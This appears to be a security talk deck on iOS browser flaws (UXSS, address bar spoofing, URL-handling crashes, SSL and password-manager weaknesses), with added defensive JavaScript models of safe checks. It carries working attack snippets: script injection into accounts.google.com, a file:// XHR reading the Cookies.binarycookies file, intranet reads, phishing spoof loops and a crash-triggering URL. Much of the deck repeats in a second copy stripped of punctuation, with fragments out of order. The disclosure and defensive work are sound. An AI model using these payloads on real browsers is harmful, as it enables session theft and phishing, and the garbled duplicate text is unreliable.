• CVE-2013-7197 UXSS in Yandex.Browser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …
CVE-2013-6893: UXSS in Mercury Browser

CVE-2013-6893 Mercury UXSS
JavaScript in the page calls window.open(); the browser's JavaScript bridge turns it into a command for the native side (WINDOW_ID = Math.random()). The same bridge is exposed to cross-frame forgery:
  w = window.open('about:blank')
  → mbexec$(WINDOW_ID)[ "command":"window.open", "target":1234, "url":"about:blank" ]
  → [webView loadRequest: … "about:blank" …]
  w.document.write('Hi')
  → mbexec$(WINDOW_ID)[ "command":"window.document.write", "target":1234, "html":"Hi" ]
  → [webView stringByEvaluatingJavaScriptFromString: "document.write('Hi')"]

CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
  w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>')
…and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser

CVE-2013-7197 Yandex UXSS
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome

CVE-2012-2899 Chrome UXSS
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]

CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
CVE-2012-2899 Chrome UXSS
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and local files

CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]

Safe cross-tab document.write
• iOS 8: use the WKWebView UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
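The bridge model below is an added example; it is not code from the slides or from Mercury, Yandex.Browser or Chrome. It models the JavaScript-to-native bridge with which UIWebView-based browsers implement cross-tab window.open() and w.document.write(), with the three checks the preceding slides show being skipped: the caller's and target's origins are compared at all (Mercury), the comparison is repeated at write time against the target's current document rather than once at open time (Yandex), and an about:blank child is loaded with an explicit about:blank base URL instead of nil, so it never lands in applewebdata:// (Chrome). Tab ids, the tab record shape and the Bridge class are hypothetical; all URLs are constructed.

```javascript
// Added example (not from the slides): same-origin checks for a cross-tab
// document.write bridge, evaluated against the target's current document.

function originOf(url) {
  // scheme://host[:port] for http(s) URLs; null for about:blank, file:, custom
  // app schemes and unparsable strings, which must never pass a same-origin test
  let u;
  try { u = new URL(url); } catch (e) { return null; }
  return (u.protocol === 'http:' || u.protocol === 'https:') ? u.origin : null;
}

class Bridge {
  constructor() { this.tabs = new Map(); this.nextId = 1; }

  addTab(url) {                    // a tab the user navigated to
    const id = this.nextId++;
    this.tabs.set(id, { url, opener: null, loads: [] });
    return id;
  }

  // bridge command "window.open" issued from tab `openerId`
  open(openerId, url) {
    const id = this.nextId++;
    this.tabs.set(id, { url, opener: openerId, loads: [] });
    return id;
  }

  // the child navigates after window.open() returned (redirect, meta refresh, ...)
  navigate(tabId, url) { this.tabs.get(tabId).url = url; }

  // bridge command "window.document.write": decide, then record how the
  // native side would load the HTML. The decision uses the target's document
  // as it is *now*, not as it was when the window was opened.
  write(callerId, targetId, html) {
    const caller = this.tabs.get(callerId);
    const target = this.tabs.get(targetId);
    if (!caller || !target) return { allowed: false, reason: 'unknown-tab' };

    if (target.url === 'about:blank') {
      // Only the opener may write into its blank child, and the content is
      // loaded with a real about:blank NSURL as baseURL, never nil.
      if (target.opener !== callerId) return { allowed: false, reason: 'not-opener' };
      target.loads.push({ html, baseURL: 'about:blank' });
      return { allowed: true, baseURL: 'about:blank' };
    }

    const callerOrigin = originOf(caller.url);
    const targetOrigin = originOf(target.url);
    if (callerOrigin === null || targetOrigin === null) return { allowed: false, reason: 'opaque-origin' };
    if (callerOrigin !== targetOrigin) return { allowed: false, reason: 'cross-origin' };
    target.loads.push({ html, baseURL: target.url });
    return { allowed: true, baseURL: target.url };
  }
}

// The three slide scenarios plus the legitimate same-origin case.
function crossTabScenarios() {
  const b = new Bridge();
  const attacker = b.addTab('http://attacker.example/');

  const google = b.open(attacker, 'https://accounts.google.com/');        // Mercury
  const mercury = b.write(attacker, google, '<script src=...></script>');

  const child = b.open(attacker, 'http://attacker.example/redirect');    // Yandex
  b.navigate(child, 'https://accounts.google.com/');
  const yandex = b.write(attacker, child, 'Hi');

  const blank = b.open(attacker, 'about:blank');                         // Chrome
  const chrome = b.write(attacker, blank, 'Hi');

  const sibling = b.open(attacker, 'http://attacker.example/page2');     // legitimate
  const sameOrigin = b.write(attacker, sibling, 'Hi');

  return { mercury, yandex, chrome, sameOrigin };
}
```

The recorded `baseURL` is the value the native side would pass to loadHTMLString:baseURL:; it is either the target's own URL or the literal about:blank, so a nil base URL cannot arise from this path.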
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] —> nil (URLWithString: returns nil for a string it cannot parse, and that nil then becomes the baseURL)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) —> NULL
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+): document.location.href, document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain → HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other with a filename ending in .html → HTML
JS without Same-Origin Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send(); alert(x.responseText);
}
</script>

JS without Same-Origin Policy
<script>x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet', false); x.send(); alert(x.responseText)</script>
Challenge: hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header / HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
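The classification function below is an added example, not code from the slides. It is the step a browser app needs between fetching a resource and handing it to a web view, written to the rules of the Content-Disposition, Content-Type and "Opening local HTML files safely" slides: only a response that declares itself HTML and is not an attachment is rendered as a document in its own origin, text/plain is shown as text, and everything else, including any attachment and any local file, goes to an isolated viewer with scripts off and baseURL about:blank. Header names are standard HTTP; the returned decision shape and the viewer settings object are hypothetical, and the sample URLs are constructed.

```javascript
// Added example (not from the slides): deciding how a fetched resource may be
// shown, so that nothing is sniffed into HTML in the hosting origin.

const ISOLATED_VIEWER = Object.freeze({
  loadAs: 'text/plain',              // never parsed as HTML
  javaScriptEnabled: false,          // WKWebView configuration.preferences.javaScriptEnabled = false
  baseURL: 'about:blank',            // opaque origin, not applewebdata:// or file://
  csp: "default-src 'none'; sandbox" // belt and braces if HTML rendering is ever enabled
});

function parseDisposition(value) {
  const v = (value || '').trim();
  const type = v.split(';')[0].trim().toLowerCase();
  const m = /filename\*?=("?)([^";]+)\1/i.exec(v);
  return { attachment: type === 'attachment', filename: m ? m[2] : null };
}

function classifyResponse(url, headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const mediaType = (h['content-type'] || '').split(';')[0].trim().toLowerCase();
  const disp = parseDisposition(h['content-disposition']);
  const u = new URL(url);
  const filename = disp.filename || u.pathname.split('/').pop() || 'download';

  if (disp.attachment) {
    // CVE-2011-3426: an attachment is never a document of the hosting site
    return { mode: 'attachment', filename, viewer: ISOLATED_VIEWER };
  }
  if (mediaType === 'text/html' || mediaType === 'application/xhtml+xml') {
    return { mode: 'render-html', origin: u.origin };
  }
  if (mediaType === 'text/plain') {
    // CVE-2013-5151: shown as text, not promoted to HTML on content sniffing
    return { mode: 'render-text', origin: u.origin };
  }
  // application/octet-stream, "application/other" with an .html filename,
  // missing Content-Type: never sniffed into HTML in the hosting origin
  return { mode: 'attachment', filename, viewer: ISOLATED_VIEWER };
}

function classifyLocalFile(path) {
  // Downloads opened directly from file:// get the same isolated treatment
  return { mode: 'attachment', filename: path.split('/').pop(), viewer: ISOLATED_VIEWER };
}
```

The viewer settings combine all four options from the last slide; an app that can only apply some of them (for instance on iOS 7, without WKWebView's JavaScript switch) should at least keep text/plain and the about:blank base URL.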
Popups & URL handling

Popups & URL handling
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

Popup blockers
• Application (bolted-on)
• Native (WebKit)

URI schemes
• Bridge (internal)
• Registered (external)
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=
CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http%, http%5, http%5c etc.
• Example, Opera Coast: <script>document.location = 'http%5c'</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
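The check below is an added example, not code from the slides or from any browser discussed. It is the string-level validation a browser app should apply before a page-supplied URL reaches NSURL or CFURL, and it covers both the "Other potential paths to applewebdata://" slide and the CFURL slide above: URLWithString: and CFURLCreateWithString return nil/NULL for a string they cannot parse, and that nil either becomes a baseURL (applewebdata:// origin) or an argument to the next CFURL call (null pointer dereference). The function refuses such strings up front so the caller never has a nil to pass along. The parser used is Node's WHATWG URL implementation, standing in for the native one; the result shape and the allowed-scheme list are hypothetical, chosen for navigation targets that come from web content.

```javascript
// Added example (not from the slides): validate page-supplied URLs before any
// native URL API sees them, instead of passing nil/NULL results along.

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);   // targets originating from web content

function prepareNativeUrl(input) {
  // Returns { ok: true, url } with a normalised absolute URL, or
  // { ok: false, reason }. In the second case the caller must not call into
  // NSURL/CFURL at all; a nil/NULL result is never a value to hand onwards.
  if (typeof input !== 'string' || input.length === 0) {
    return { ok: false, reason: 'empty' };
  }
  // The scheme must be literal letters before the first ':'. "http%5c:" and
  // "http%" are not schemes, whatever a lenient native parser does with them.
  const m = /^([^:\/?#]+):/.exec(input);
  if (!m || !/^[A-Za-z][A-Za-z0-9+.-]*$/.test(m[1])) {
    return { ok: false, reason: 'bad-scheme' };
  }
  let u;
  try { u = new URL(input); } catch (e) { return { ok: false, reason: 'unparsable' }; }
  if (!ALLOWED_SCHEMES.has(u.protocol)) {
    // file:, custom app schemes (googlechrome:, merc:, ...) and bridge
    // schemes are handled by their own code paths, not by web navigation
    return { ok: false, reason: 'scheme-not-allowed:' + u.protocol };
  }
  return { ok: true, url: u.href };
}

// Applies the check to the strings the two slides mention (constructed here).
function urlCheckScenarios() {
  return {
    percentScheme: prepareNativeUrl('http%5c://example.com'),
    truncatedPercent: prepareNativeUrl('http%'),
    plain: prepareNativeUrl('http://example.com'),
    localFile: prepareNativeUrl('file:///etc/passwd'),
    formatString: prepareNativeUrl('lets-try-format-string:%p%p%p%p'),
  };
}
```

The same rule applies to the baseURL passed with loadHTMLString:: build it from a validated string, and when validation fails use an explicit about:blank NSURL rather than the nil the failed parse returned.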
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of the tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)
Password managers
• JavaScript with the privileges of the top frame —> passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks for domain, but not always for URL scheme (https vs http)
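The fill and save decisions below are an added example, not code from the slides or from any password manager tested. They implement the three points of the slide from the defender's side: credentials are keyed by full origin (scheme, host, port), so an http page never receives a password saved on https; filling is refused in subframes, where the filling JavaScript would run with the top frame's privileges; and a credential is saved only under the origin of the document that contained the form, not under a URL the page supplied, and only after the user confirmed. The host-only comparison is kept alongside to show what it would have allowed. The store layout and the frame and submission record shapes are hypothetical; URLs and credentials are constructed.

```javascript
// Added example (not from the slides): origin-keyed autofill and save rules
// for a browser's built-in password manager.

function originKey(url) {
  return new URL(url).origin;         // e.g. "https://accounts.google.com"
}

// The check the slide criticises, kept for comparison: host only, scheme ignored.
function hostOnlyMatch(savedUrl, pageUrl) {
  return new URL(savedUrl).hostname === new URL(pageUrl).hostname;
}

function mayAutofill(store, frame) {
  // frame: { url, isTopFrame, tlsValid }
  if (!frame.isTopFrame) return { fill: false, reason: 'subframe' };
  const key = originKey(frame.url);
  // a credential saved on https must not be filled over a broken TLS session either
  if (key.startsWith('https://') && !frame.tlsValid) return { fill: false, reason: 'tls-error' };
  const cred = store.get(key);
  if (!cred) return { fill: false, reason: 'no-credential-for-origin' };
  return { fill: true, username: cred.username };
}

function maySave(store, submission) {
  // submission: { documentUrl, formAction, isTopFrame, username, password, userConfirmed }
  if (!submission.isTopFrame) return { saved: false, reason: 'subframe' };
  if (!submission.userConfirmed) return { saved: false, reason: 'not-confirmed' };
  // keyed by the document's origin, never by the form action, which the page controls
  const key = originKey(submission.documentUrl);
  store.set(key, { username: submission.username, password: submission.password });
  return { saved: true, key };
}

function autofillScenarios() {
  const store = new Map();
  store.set('https://accounts.google.com', { username: 'alice', password: 'constructed-secret' });

  const httpDowngrade = mayAutofill(store,
    { url: 'http://accounts.google.com/login', isTopFrame: true, tlsValid: false });
  const hostOnlyWouldFill = hostOnlyMatch('https://accounts.google.com/', 'http://accounts.google.com/login');
  const inSubframe = mayAutofill(store,
    { url: 'https://accounts.google.com/login', isTopFrame: false, tlsValid: true });
  const legitimate = mayAutofill(store,
    { url: 'https://accounts.google.com/login', isTopFrame: true, tlsValid: true });
  // a page on another domain posting a form whose action points at the target site
  const forcedSave = maySave(store, {
    documentUrl: 'http://attacker.example/', formAction: 'https://accounts.google.com/login',
    isTopFrame: true, username: 'victim', password: 'x', userConfirmed: true,
  });
  return { httpDowngrade, hostOnlyWouldFill, inSubframe, legitimate, forcedSave,
           googleEntry: store.get('https://accounts.google.com') };
}
```

The forced-save case shows why keying by document origin matters: the submission is stored under the attacker's origin and the existing entry for the target site is untouched, so no later fill on the target site can be poisoned from another domain.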
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?

lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu

Thank you
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)

Address Bar Spoofing: Untracked Content
Replace window content with untracked content. document.write and/or data: URIs are usually good candidates:
• w = window.open('https://accounts.google.com'); setTimeout(function(){ w.document.write(…); }, …)
• CVE-2013-5152 Mobile Safari Address Bar Spoofing: reported in iOS 5.1.1, fixed in iOS 7

Address Bar Spoofing: Init & Interrupt
Initialise the window with the target URL, replace it with phishing content before it loads:
• w = window.open('https://accounts.google.com'); w.document.write(…)
Optionally fall back to the native window.open:
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…)
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45 of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)

Address Bar Spoofing: Failed Navigation
An incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN - host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing error alerts

Address Bar Spoofing: Loading loop
• HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
